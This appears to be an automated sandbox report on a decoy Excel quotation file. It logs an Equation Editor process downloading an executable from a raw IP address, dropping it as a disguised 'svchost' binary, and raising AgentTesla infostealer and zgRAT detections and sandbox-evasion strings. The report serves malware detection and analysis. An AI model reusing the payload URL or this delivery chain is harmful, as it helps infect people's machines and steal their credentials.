                Source: EQNEDT32.EXE, 00000002.00000002.980379533.00000000005A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.12.89.152/mon/mon.exehhC:
                Source: Regasm_svchost.exe, 00000006.00000002.1174896725.000000000262C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77qlBFDgeMeBhXCCMul.org
                Source: Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                Source: Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ZSkVPd.com
                Source: Regasm_svchost.exe, 00000006.00000002.1174896725.000000000262C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9FBCD146.wmfJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_033F0517 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,
                Source: global trafficHTTP traffic detected: GET /mon/mon.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.89.152Connection: Keep-Alive

                System Summary

                barindex
                Source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: Regasm_svchost.exe PID: 2884, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: Regasm_svchost.exe PID: 616, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mon[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\Regasm_svchost.exeJump to dropped file
                Source: 6.0.Regasm_svchost.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b6FDDE178u002d8CC0u002d48F2u002d916Fu002d3E2DAE062187u007d/u0034CAF38F2u002d454Fu002d4211u002dA62Cu002d7FB6FD0C5EE8.csLarge array initialization: .cctor: array initializer size 11646
                Source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: Regasm_svchost.exe PID: 2884, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: Regasm_svchost.exe PID: 616, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 5_2_001D7060
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 5_2_001DEDF0
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 5_2_00A40048
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 5_2_00A40024
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 5_2_00A46B98
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 5_2_00A411E8
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 5_2_00A411D9
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 6_2_003D42A0
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 6_2_003D4EB8
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 6_2_003DDED8
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 6_2_003DCA48
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 6_2_003D45E8
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 6_2_0062E839
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 6_2_0062ACE8
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 6_2_0062D4F8
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 6_2_00624950
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 6_2_0062C788
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 6_2_00627B98
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 6_2_0062F0E8
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 6_2_00625102
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 6_2_00660468
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and write
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and write
                Source: C:\Users\Public\Regasm_svchost.exeMemory allocated: 77620000 page execute and read and write
                Source: C:\Users\Public\Regasm_svchost.exeMemory allocated: 77740000 page execute and read and write
                Source: C:\Users\Public\Regasm_svchost.exeMemory allocated: 77620000 page execute and read and write
                Source: C:\Users\Public\Regasm_svchost.exeMemory allocated: 77740000 page execute and read and write
                Source: mon[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Regasm_svchost.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Quotation - Optical Eyeglasses.xlsxVirustotal: Detection: 35%
                Source: Quotation - Optical Eyeglasses.xlsxReversingLabs: Detection: 31%
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\Regasm_svchost.exe "C:\Users\Public\Regasm_svchost.exe"
                Source: C:\Users\Public\Regasm_svchost.exeProcess created: C:\Users\Public\Regasm_svchost.exe C:\Users\Public\Regasm_svchost.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\Regasm_svchost.exe "C:\Users\Public\Regasm_svchost.exe"
                Source: C:\Users\Public\Regasm_svchost.exeProcess created: C:\Users\Public\Regasm_svchost.exe C:\Users\Public\Regasm_svchost.exe
                Source: C:\Users\Public\Regasm_svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                Source: C:\Users\Public\Regasm_svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                Source: C:\Users\Public\Regasm_svchost.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Quotation - Optical Eyeglasses.xlsxJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR692D.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@6/23@0/1
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\Public\Regasm_svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Users\Public\Regasm_svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: 6.0.Regasm_svchost.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 6.0.Regasm_svchost.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\Public\Regasm_svchost.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 5_2_00A44FB3 push ebp; ret
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 6_2_003D03E2 pushfd ; retf 0017h
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 6_2_003D2591 pushfd ; retf 0017h
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 6_2_00627328 push eax; retf
                Source: C:\Users\Public\Regasm_svchost.exeCode function: 6_2_006273C0 pushad ; retf
                Source: initial sampleStatic PE information: section name: .text entropy: 7.741618830897132
                Source: initial sampleStatic PE information: section name: .text entropy: 7.741618830897132
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mon[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\Regasm_svchost.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_033F0517 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\Regasm_svchost.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\Regasm_svchost.exeJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Regasm_svchost.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: 00000005.00000002.989370105.000000000278B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Regasm_svchost.exe PID: 2884, type: MEMORYSTR
                Source: Regasm_svchost.exe, 00000005.00000002.989370105.000000000278B000.00000004.00000800.00020000.00000000.sdmp, Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: Regasm_svchost.exe, 00000005.00000002.989370105.000000000278B000.00000004.00000800.00020000.00000000.sdmp, Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
